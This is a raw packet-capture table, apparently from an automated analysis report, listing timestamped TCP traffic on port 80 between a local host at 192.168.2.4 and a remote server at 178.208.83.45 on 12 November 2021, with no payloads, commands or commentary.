                          Nov 12, 2021 22:23:13.849318981 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849338055 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849358082 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849380016 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849437952 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849455118 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849472046 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849487066 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849502087 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849518061 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849564075 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.849577904 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.871961117 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.871993065 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872010946 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872029066 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872045040 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872062922 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872086048 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872134924 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872251034 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872272968 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872313023 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.872327089 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.875251055 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:13.875339985 CET4979180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.271544933 CET4979180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.273036957 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.294332027 CET8049791178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.294445992 CET4979180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.295691013 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.295835972 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.296639919 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.296825886 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.297132969 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.297383070 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.318993092 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.319067001 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.319174051 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.319669008 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.319710016 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.319783926 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.319808960 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.319874048 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.319880962 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.319940090 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.319956064 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.342308998 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.342338085 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.342365026 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.342375994 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.342439890 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.342458963 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.342485905 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.342525959 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.342539072 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.342544079 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.342564106 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.342580080 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.342618942 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.342648029 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.342698097 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.344290972 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365005970 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365050077 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365065098 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365083933 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365098000 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365097046 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365119934 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365185976 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365207911 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365211010 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365259886 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365262985 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365351915 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365375042 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365397930 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365415096 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365420103 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365442038 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365453959 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365468979 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365473986 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365492105 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365494013 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365511894 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365520954 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365534067 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365552902 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365561008 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365592003 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365614891 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365658998 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365681887 CET8049792178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.365771055 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365792990 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365837097 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.365853071 CET4979280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.761238098 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.784266949 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.785058022 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.786380053 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.786647081 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.786989927 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.787478924 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.808700085 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.808790922 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.808928967 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.809268951 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.809319019 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.809406996 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.809416056 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.809432030 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.809493065 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.809529066 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.809755087 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.809900045 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.832662106 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.832678080 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.832693100 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.832700968 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.832714081 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.832766056 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.832777977 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.833225012 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.833235025 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.834769964 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.835196972 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.857237101 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857253075 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857271910 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857280016 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857292891 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857335091 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857379913 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857388973 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857491970 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857502937 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857516050 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857522964 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857536077 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857597113 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857652903 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857692003 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857706070 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.857732058 CET8049793178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:14.858414888 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858444929 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858448982 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858452082 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858453989 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858457088 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858459949 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858462095 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858469009 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858470917 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858474970 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858478069 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858479977 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858575106 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858580112 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858582973 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858586073 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:14.858588934 CET4979380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.259609938 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.282604933 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.283781052 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.331141949 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.331315994 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.331679106 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.331758976 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.353610039 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.353624105 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.353988886 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354005098 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354012012 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354020119 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354028940 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354037046 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354046106 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354063988 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354067087 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354079962 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.354157925 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.354197979 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.354348898 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.376704931 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376723051 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376740932 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376753092 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376764059 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376774073 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376790047 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376801968 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376816034 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376827955 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376842022 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376872063 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376885891 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376897097 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.376897097 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376908064 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376923084 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376931906 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376945972 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376956940 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.376960993 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.376981974 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.376991987 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.390204906 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.390387058 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.399277925 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399295092 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399317026 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399327993 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399343014 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399354935 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399364948 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399375916 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399388075 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399404049 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399414062 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399427891 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399435997 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.399471045 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.399542093 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399555922 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399570942 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399581909 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399596930 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399609089 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399626017 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399638891 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399657011 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399668932 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399686098 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399697065 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399712086 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.399866104 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.412633896 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412657022 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412664890 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412678003 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412687063 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412698030 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412708044 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412724018 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412734985 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412765980 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412775993 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412791967 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412826061 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.412843943 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.421854019 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.421946049 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.421983957 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.422024965 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.422105074 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.422185898 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.422200918 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.422220945 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.424283981 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.424595118 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.808548927 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.810725927 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.830914021 CET8049794178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.831002951 CET4979480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.833753109 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.833827972 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.834525108 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.834671974 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.834888935 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.835007906 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.856770039 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.856853008 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857086897 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857121944 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857165098 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857177019 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857187986 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857228041 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.857259989 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.857297897 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857310057 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857321978 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857332945 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857343912 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.857369900 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.857422113 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.879837990 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.879856110 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.879864931 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.879875898 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.879889011 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.879899979 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.879940987 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.880002022 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880017996 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880028963 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.880031109 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880043030 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880053043 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880057096 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880078077 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880099058 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.880103111 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880132914 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.880158901 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.880207062 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.880208969 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880223989 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880234957 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880248070 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880259037 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.880295038 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.880331039 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.902179956 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902256966 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902270079 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902281046 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902292967 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902307034 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.902359962 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902385950 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.902426958 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.902439117 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902452946 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902466059 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902477980 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902491093 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:15.902491093 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902544022 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902555943 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902570009 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902635098 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902648926 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902667046 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902674913 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902678013 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902692080 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902707100 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902745008 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902756929 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902789116 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902801037 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902813911 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902827024 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902839899 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902851105 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902862072 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902900934 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902911901 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902924061 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902936935 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902947903 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902960062 CET8049795178.208.83.45192.168.2.4
